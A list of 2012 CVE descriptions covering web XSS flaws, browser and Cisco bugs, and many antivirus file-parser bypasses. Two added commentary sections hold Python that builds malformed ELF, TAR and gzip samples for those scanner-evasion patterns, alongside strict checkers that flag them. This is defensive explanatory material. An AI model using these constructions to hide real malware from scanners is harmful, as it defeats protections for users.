[CVE-2012-1607] The Command Line Interface (CLI) script in TYPO3 4.4.0 through 4.4.13, 4.5.0 through 4.5.13, 4.6.0 through 4.6.6, 4.7, and 6.0 allows remote attackers to obtain the database name via a direct request.
[CVE-2012-1606] Multiple cross-site scripting (XSS) vulnerabilities in the Backend component in TYPO3 4.4.0 through 4.4.13, 4.5.0 through 4.5.13, 4.6.0 through 4.6.6, 4.7, and 6.0 allow remote authenticated backend users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1604] Cross-site scripting (XSS) vulnerability in NextBBS 0.6 allows remote attackers to inject arbitrary web script or HTML via the do parameter to index.php.
[CVE-2012-1597] Cross-site scripting (XSS) vulnerability in the textEncode function in classes/ezjscajaxcontent.php in eZ JS Core in eZ Publish before 1.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1589] Open redirect vulnerability in the Form API in Drupal 7.x before 7.13 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via crafted parameters in a destination URL.
[CVE-2012-1582] Cross-site scripting (XSS) vulnerability in the wikitext parser in MediaWiki 1.17.x before 1.17.3 and 1.18.x before 1.18.2 allows remote attackers to inject arbitrary web script or HTML via a crafted page with "forged strip item markers," as demonstrated using the CharInsert extension.
[CVE-2012-1575] Multiple cross-site scripting (XSS) vulnerabilities in Cumin before r5238 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) widgets or (2) pages.
[CVE-2012-1564] Cross-site scripting (XSS) vulnerability in administration/create_album.php in YVS Image Gallery allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1539] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CTreePos Use After Free Vulnerability."
[CVE-2012-1538] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CFormElement Use After Free Vulnerability."
[CVE-2012-1529] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly initialized or (2) is deleted, aka "OnMove Use After Free Vulnerability."
[CVE-2012-1520] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-1513] The Web Configuration tool in VMware vCenter Orchestrator (vCO) 4.0 before Update 4, 4.1 before Update 2, and 4.2 before Update 1 places the vCenter Server password in an HTML document, which allows remote authenticated administrators to obtain sensitive information by reading this document.
[CVE-2012-1512] Cross-site scripting (XSS) vulnerability in the internal browser in vSphere Client in VMware vSphere 4.1 before Update 2 and 5.0 before Update 1 allows remote attackers to inject arbitrary web script or HTML via a crafted log-file entry.
[CVE-2012-1511] Cross-site scripting (XSS) vulnerability in View Manager Portal in VMware View before 4.6.1 allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2012-1498] Multiple cross-site request forgery (CSRF) vulnerabilities in Webfolio CMS 1.1.4 and earlier allow remote attackers to hijack the authentication of administrators for requests that (1) add an administrator via an add action to admin/users/add or (2) modify a web page via a save action to admin/pages/edit/web_page_name.
[CVE-2012-1470] Multiple cross-site scripting (XSS) vulnerabilities in code_editor.php in ocPortal before 7.1.6 allow remote attackers to inject arbitrary web script or HTML via the (1) path or (2) line parameters.
[CVE-2012-1469] Multiple cross-site scripting (XSS) vulnerabilities in Open Journal Systems before 2.3.7 allow remote attackers and remote authenticated users to inject arbitrary web script or HTML via the (1) editor or (2) callback parameters to lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php in the iBrowser plugin, (3) authors[][url] parameter to index.php, or (4) Bio Statement or (5) Abstract of Submission fields to the stripUnsafeHtml function in lib/pkp/classes/core/String.inc.php.
[CVE-2012-1461] The Gzip file parser in AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, and VBA32 3.12.14.2 allows remote attackers to bypass malware detection via a .tar.gz file with multiple compressed streams. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different Gzip parser implementations.
[CVE-2012-1459] The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
[CVE-2012-1457] The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
[CVE-2012-1456] The TAR file parser in AVG Anti-Virus 10.0.0.1190, Quick Heal (aka Cat QuickHeal) 11.00, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, Panda Antivirus 10.0.2.7, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a TAR file with an appended ZIP file. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
[CVE-2012-1454] The ELF file parser in Dr.Web 5.0.2.03300, eSafe 7.0.17.0, McAfee Gateway (formerly Webwasher) 2010.1C, Rising Antivirus 22.83.00.03, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified ei_version field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations.
[CVE-2012-1453] The CAB file parser in Dr.Web 5.0.2.03300, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Sophos Anti-Virus 4.61.0, Trend Micro AntiVirus 9.120.0.1004, McAfee Gateway (formerly Webwasher) 2010.1C, Emsisoft Anti-Malware 5.1.0.1, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Rising Antivirus 22.83.00.03, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via a CAB file with a modified coffFiles field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CAB parser implementations.
[CVE-2012-1447] The ELF file parser in Fortinet Antivirus 4.2.254.0, eSafe 7.0.17.0, Dr.Web 5.0.2.03300, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified e_version field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations.
[CVE-2012-1446] The ELF file parser in Quick Heal (aka Cat QuickHeal) 11.00, McAfee Anti-Virus Scanning Engine 5.400.0.1158, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Norman Antivirus 6.06.12, eSafe 7.0.17.0, Kaspersky Anti-Virus 7.0.0.125, McAfee Gateway (formerly Webwasher) 2010.1C, Sophos Anti-Virus 4.61.0, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified encoding field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations.
[CVE-2012-1443] The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations.
[CVE-2012-1442] The ELF file parser in Quick Heal (aka Cat QuickHeal) 11.00, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, eSafe 7.0.17.0, Kaspersky Anti-Virus 7.0.0.125, F-Secure Anti-Virus 9.0.16160.0, Sophos Anti-Virus 4.61.0, Antiy Labs AVL SDK 2.0.3.7, Rising Antivirus 22.83.00.03, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified class field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations.
[CVE-2012-1431] The ELF file parser in Bitdefender 7.2, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, McAfee Gateway (formerly Webwasher) 2010.1C, nProtect Anti-Virus 2011-01-17.01, Sophos Anti-Virus 4.61.0, and Rising Antivirus 22.83.00.03 allows remote attackers to bypass malware detection via an ELF file with a \4a\46\49\46 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations.
[CVE-2012-1430] The ELF file parser in Bitdefender 7.2, Comodo Antivirus 7424, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, nProtect Anti-Virus 2011-01-17.01, Sophos Anti-Virus 4.61.0, and Rising Antivirus 22.83.00.03 allows remote attackers to bypass malware detection via an ELF file with a \19\04\00\10 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations.
[CVE-2012-1429] The ELF file parser in Bitdefender 7.2, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, and nProtect Anti-Virus 2011-01-17.01 allows remote attackers to bypass malware detection via an ELF file with a ustar character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations.
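The seven ELF entries above (CVE-2012-1429, 1430, 1431, 1442, 1446, 1447 and 1454) describe one technique rather than seven bugs: change a header field the loader tolerates (EI_CLASS, EI_DATA, EI_VERSION, e_version) or plant another format's signature inside the file, and an engine that decides "not an ELF" stops scanning it as one. The check a scanner actually needs is therefore the opposite of a strict reject: key the format decision on the four magic bytes at offset 0, report out-of-spec fields as anomalies, and still scan. The following is an added example written for this page, not code from any of the vendors listed or from the CVE sources. It constructs a minimal ELF64 header with those fields as parameters; the offset used for the "ustar" decoy (257, the POSIX tar magic offset) is an assumption, since the entries only say "a certain location".

```python
"""Strict ELF header checks for the e_ident / e_version bypass patterns above (added example, not vendor code)."""
import struct

ELFMAG = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2      # e_ident[EI_CLASS], the "class field" of CVE-2012-1442
ELFDATA2LSB, ELFDATA2MSB = 1, 2    # e_ident[EI_DATA], the "encoding field" of CVE-2012-1446
EV_CURRENT = 1                     # e_ident[EI_VERSION] (CVE-2012-1454) and e_version (CVE-2012-1447)
E_VERSION_OFF = 20                 # e_version is a 4-byte word at offset 20 in both Elf32_Ehdr and Elf64_Ehdr
TAR_MAGIC_OFF = 257                # "ustar" offset in a POSIX tar header; ASSUMED to be the location CVE-2012-1429 means


def make_elf_header(ei_class=ELFCLASS64, ei_data=ELFDATA2LSB, ei_version=EV_CURRENT, e_version=EV_CURRENT) -> bytes:
    """Constructed 64-byte ELF64 header (ET_EXEC, EM_X86_64) with the four contested fields as parameters."""
    endian = ">" if ei_data == ELFDATA2MSB else "<"
    ident = ELFMAG + bytes([ei_class, ei_data, ei_version, 0, 0]) + b"\0" * 7
    return (ident + struct.pack(endian + "HHI", 2, 62, e_version)).ljust(64, b"\0")


def is_elf_candidate(data: bytes) -> bool:
    """The only thing the format decision should depend on: the magic at offset 0."""
    return data[:4] == ELFMAG


def elf_header_anomalies(data: bytes) -> list:
    """List e_ident / e_version values outside the spec. Non-empty means 'odd ELF', never 'not ELF'."""
    if not is_elf_candidate(data):
        return ["not-elf"]
    if len(data) < E_VERSION_OFF + 4:
        return ["truncated-header"]
    out = []
    ei_class, ei_data, ei_version = data[4], data[5], data[6]
    if ei_class not in (ELFCLASS32, ELFCLASS64):
        out.append("EI_CLASS=%d" % ei_class)
    if ei_data not in (ELFDATA2LSB, ELFDATA2MSB):
        out.append("EI_DATA=%d" % ei_data)
    if ei_version != EV_CURRENT:
        out.append("EI_VERSION=%d" % ei_version)
    if any(data[9:16]):                      # EI_PAD must be zero
        out.append("nonzero-EI_PAD")
    endian = ">" if ei_data == ELFDATA2MSB else "<"
    (e_version,) = struct.unpack_from(endian + "I", data, E_VERSION_OFF)
    if e_version != EV_CURRENT:
        out.append("e_version=%d" % e_version)
    return out


def classify(data: bytes) -> str:
    """Format sniffing that checks offset 0 first, so a signature planted deeper in the file cannot flip the verdict."""
    if is_elf_candidate(data):
        return "elf"
    if data[TAR_MAGIC_OFF:TAR_MAGIC_OFF + 5] == b"ustar":
        return "tar"
    if data[:3] == b"\xff\xd8\xff" and data[6:10] == b"JFIF":   # the \4a\46\49\46 sequence of CVE-2012-1431
        return "jpeg"
    return "unknown"


def plant_tar_magic(elf: bytes) -> bytes:
    """Constructed decoy: a well-formed ELF header followed by 'ustar' at the (assumed) tar magic offset."""
    padded = elf.ljust(TAR_MAGIC_OFF + 5 + 32, b"\0")
    return padded[:TAR_MAGIC_OFF] + b"ustar" + padded[TAR_MAGIC_OFF + 5:]
```

Note what elf_header_anomalies does not do: it never returns "not-elf" for a file that carries the magic. A scanner that treats EI_VERSION=9 or EI_CLASS=7 as grounds to skip ELF scanning is reproducing exactly the behaviour these entries document.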
[CVE-2012-1425] The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \50\4B\03\04 character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
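The TAR and gzip entries above (CVE-2012-1425, 1456, 1457, 1459 and 1461) all exploit the gap between what the scanner's archive walker accepts and what tar and gzip actually extract: a size field larger than the file, a size field that swallows the next header, a ZIP glued on after the end-of-archive marker, a tar whose first filename starts with the ZIP signature, or a .gz made of several concatenated members. The following is an added example written for this page, not code from any listed vendor; it builds one constructed input per pattern with Python's standard library and runs a strict walker over them that names the condition each one relies on. The finding labels, file names and payload strings are all made up for the example.

```python
"""Constructed TAR / gzip inputs for the archive-parser bypass patterns above (added example, not vendor code)."""
import gzip
import io
import zipfile
import zlib

BLOCK = 512
ZIP_SIG = b"PK\x03\x04"   # the \50\4B\03\04 sequence from CVE-2012-1425


def _octal(value: int, width: int) -> bytes:
    """NUL-terminated zero-padded octal, as ustar numeric fields are written."""
    return (b"%o" % value).rjust(width - 1, b"0") + b"\x00"


def tar_header(name: bytes, size: int) -> bytes:
    """POSIX ustar header for a regular file; checksum = byte sum with the chksum field read as 8 spaces."""
    hdr = bytearray(BLOCK)
    hdr[0:len(name)] = name
    hdr[100:108] = _octal(0o644, 8)        # mode
    hdr[108:116] = _octal(0, 8)            # uid
    hdr[116:124] = _octal(0, 8)            # gid
    hdr[124:136] = _octal(size, 12)        # size: the field CVE-2012-1457 / CVE-2012-1459 manipulate
    hdr[136:148] = _octal(0, 12)           # mtime
    hdr[148:156] = b" " * 8                # chksum placeholder
    hdr[156] = ord("0")                    # typeflag: regular file
    hdr[257:265] = b"ustar\x0000"          # magic + version
    hdr[148:156] = (b"%06o" % sum(hdr)) + b"\x00 "
    return bytes(hdr)


def make_tar(entries, declared_size=None) -> bytes:
    """Build a TAR from (name, data) pairs; declared_size overrides the size field of the first entry only."""
    out = b""
    for i, (name, data) in enumerate(entries):
        size = declared_size if (i == 0 and declared_size is not None) else len(data)
        out += tar_header(name, size) + data + b"\0" * (-len(data) % BLOCK)
    return out + b"\0" * (2 * BLOCK)


def _num(hdr: bytes, start: int, end: int) -> int:
    raw = hdr[start:end].split(b"\0")[0].strip()
    return int(raw, 8) if raw else 0


def tar_anomalies(blob: bytes) -> list:
    """Walk the archive the way a strict scanner should and name every condition an evasive file relies on."""
    findings = []
    if blob.startswith(ZIP_SIG):
        findings.append("zip-signature-at-offset-0")       # CVE-2012-1425: sniffer says ZIP, tar still extracts
    off = 0
    while off + BLOCK <= len(blob):
        hdr = blob[off:off + BLOCK]
        if hdr == b"\0" * BLOCK:                           # first block of the end-of-archive marker
            tail = blob[off + 2 * BLOCK:]
            if tail.strip(b"\0"):
                findings.append("zip-appended" if ZIP_SIG in tail else "trailing-data")  # CVE-2012-1456
            return findings
        if _num(hdr, 148, 156) != sum(hdr[:148]) + 8 * 0x20 + sum(hdr[156:]):
            return findings + ["bad-checksum@%d" % off]    # CVE-2012-1459: size swallowed the next header
        size = _num(hdr, 124, 136)
        if off + BLOCK + size > len(blob):
            return findings + ["size-exceeds-archive@%d" % off]  # CVE-2012-1457
        off += BLOCK + size + (-size % BLOCK)
    return findings + ["no-end-of-archive"]


def gzip_member_count(blob: bytes) -> int:
    """Count concatenated gzip members; an engine that inflates only the first never sees the rest (CVE-2012-1461)."""
    count, rest = 0, blob
    while rest.startswith(b"\x1f\x8b"):
        d = zlib.decompressobj(16 + zlib.MAX_WBITS)
        d.decompress(rest)
        if not d.eof:
            break
        count, rest = count + 1, d.unused_data
    return count


def inflate_all(blob: bytes) -> bytes:
    """What a correct scanner feeds to its signature engine: every member, not just the first."""
    return gzip.decompress(blob)


def sample_archives() -> dict:
    """Constructed test inputs, one per pattern, plus a well-formed control."""
    hello, world = b"hello\n", b"world\n"
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as z:
        z.writestr("x.bin", b"constructed payload")
    control = make_tar([(b"a.txt", hello)])
    return {
        "control": control,
        "oversized-length": make_tar([(b"a.txt", hello)], declared_size=1 << 20),
        "overlapping-length": make_tar([(b"a.txt", hello), (b"b.txt", world)], declared_size=BLOCK + 100),
        "zip-prefixed": make_tar([(ZIP_SIG + b"a.txt", hello)]),   # valid checksum, name starts with PK\x03\x04
        "zip-appended": control + zbuf.getvalue(),
        "multi-member-gzip": gzip.compress(b"benign") + gzip.compress(b"constructed payload"),
    }
```

Two design points carry over to any scanner: the walker verifies the header checksum before trusting the size field, so an entry whose size overlaps the next header is caught at the next block rather than silently skipped, and it keeps reading past the end-of-archive marker, because tar stops there but a ZIP extractor started on the same bytes does not. For gzip the rule is the mirror image: keep inflating while the next member's magic is present, since gzip itself concatenates members and a signature in member two is as reachable as one in member one. The RAR entry CVE-2012-1443 (an initial MZ sequence) is the same offset-0 sniffing problem and is not built here.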
[CVE-2012-1413] Cross-site scripting (XSS) vulnerability in zc_install/includes/modules/pages/database_setup/header_php.php in Zen Cart 1.5.0 and earlier, when the software is being installed, allows remote attackers to inject arbitrary web script or HTML via the db_username parameter to zc_install/index.php.
[CVE-2012-1410] Multiple cross-site scripting (XSS) vulnerabilities in the History Window implementation in Kadu 0.9.0 through 0.11.0 allow remote attackers to inject arbitrary web script or HTML via a crafted (1) SMS message, (2) presence message, or (3) status description.
[CVE-2012-1350] Cisco IOS 12.3 and 12.4 on Aironet access points allows remote attackers to cause a denial of service (radio-interface input-queue hang) via IAPP 0x3281 packets, aka Bug ID CSCtc12426.
[CVE-2012-1344] Cisco IOS 15.1 and 15.2, when a clientless SSL VPN is configured, allows remote authenticated users to cause a denial of service (device reload) by using a web browser to refresh the SSL VPN portal page, as demonstrated by the Android browser, aka Bug ID CSCtr86328.
[CVE-2012-1338] Cisco IOS 15.0 and 15.1 on Catalyst 3560 and 3750 series switches allows remote authenticated users to cause a denial of service (device reload) by completing local web authentication quickly, aka Bug ID CSCts88664.
[CVE-2012-1337] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP10, and T27 LD before SP32 CP1 allows remote attackers to execute arbitrary code via a crafted WRF file, a different vulnerability than CVE-2012-1335 and CVE-2012-1336.
[CVE-2012-1336] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP10, and T27 LD before SP32 CP1 allows remote attackers to execute arbitrary code via a crafted WRF file, a different vulnerability than CVE-2012-1335 and CVE-2012-1337.
[CVE-2012-1335] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP10, and T27 LD before SP32 CP1 allows remote attackers to execute arbitrary code via a crafted WRF file, a different vulnerability than CVE-2012-1336 and CVE-2012-1337.
[CVE-2012-1311] The RSVP feature in Cisco IOS 15.0 and 15.1 and IOS XE 3.2.xS through 3.4.xS before 3.4.2S, when a VRF interface is configured, allows remote attackers to cause a denial of service (interface queue wedge and service outage) via crafted RSVP packets, aka Bug ID CSCts80643.
[CVE-2012-1296] Multiple cross-site scripting (XSS) vulnerabilities in apps/admin/handlers/preview.php in Elefant CMS 1.0.x before 1.0.2-Beta and 1.1.x before 1.1.5-Beta allow remote attackers to inject arbitrary web script or HTML via the (1) title or (2) body parameter to admin/preview.
[CVE-2012-1293] Multiple cross-site scripting (XSS) vulnerabilities in fup in Frams' Fast File EXchange (F*EX, aka fex) before 20111129-2 allow remote attackers to inject arbitrary web script or HTML via the (1) to or (2) from parameters.
[CVE-2012-1291] Unspecified vulnerability in the com.sap.aii.mdt.amt.web.AMTPageProcessor servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the Adapter Monitor via unspecified vectors, possibly related to the EnableInvokerServletGlobally property in the servlet_jsp service.
[CVE-2012-1290] Cross-site scripting (XSS) vulnerability in b2b/auction/container.jsp in the Internet Sales (crm.b2b) module in SAP NetWeaver 7.0 allows remote attackers to inject arbitrary web script or HTML via the _loadPage parameter.
[CVE-2012-1289] Multiple directory traversal vulnerabilities in SAP NetWeaver 7.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the logfilename parameter to (1) b2b/admin/log.jsp or (2) b2b/admin/log_view.jsp in the Internet Sales (crm.b2b) component, or (3) ipc/admin/log.jsp or (4) ipc/admin/log_view.jsp in the Application Administration (com.sap.ipc.webapp.ipc) component.
[CVE-2012-1262] Cross-site scripting (XSS) vulnerability in cgi-bin/mt/mt-wizard.cgi in Movable Type before 4.38, 5.0x before 5.07, and 5.1x before 5.13, when the product is incompletely installed, allows remote attackers to inject arbitrary web script or HTML via the dbuser parameter, a different vulnerability than CVE-2012-0318.
[CVE-2012-1254] Cross-site scripting (XSS) vulnerability in Segue 2.2.10.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1253] Cross-site scripting (XSS) vulnerability in Roundcube Webmail before 0.7, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via vectors involving an embedded image attachment.
[CVE-2012-1252] Cross-site scripting (XSS) vulnerability in RSSOwl before 2.1.1 allows remote attackers to inject arbitrary web script or HTML via a feed, a different vulnerability than CVE-2006-4760.
[CVE-2012-1249] The iLunascape application 1.0.4.0 and earlier for Android does not properly implement the WebView class, which allows remote attackers to obtain sensitive stored information via a crafted application.
[CVE-2012-1247] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB MART 1.7 and earlier, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML by leveraging support for Cascading Style Sheets (CSS) expressions.
[CVE-2012-1246] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB MART 1.7 and earlier might allow remote attackers to inject arbitrary web script or HTML via a crafted cookie.
[CVE-2012-1245] Cross-site scripting (XSS) vulnerability in the cleanup_urls function in forum/utils/html.py in OSQA before 1234, and 0.9.0 Beta 3 and earlier, allows remote attackers to inject arbitrary web script or HTML via vectors related to a crafted URI.
[CVE-2012-1243] The TwitRocker2 application before 1.0.23 for Android does not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application.
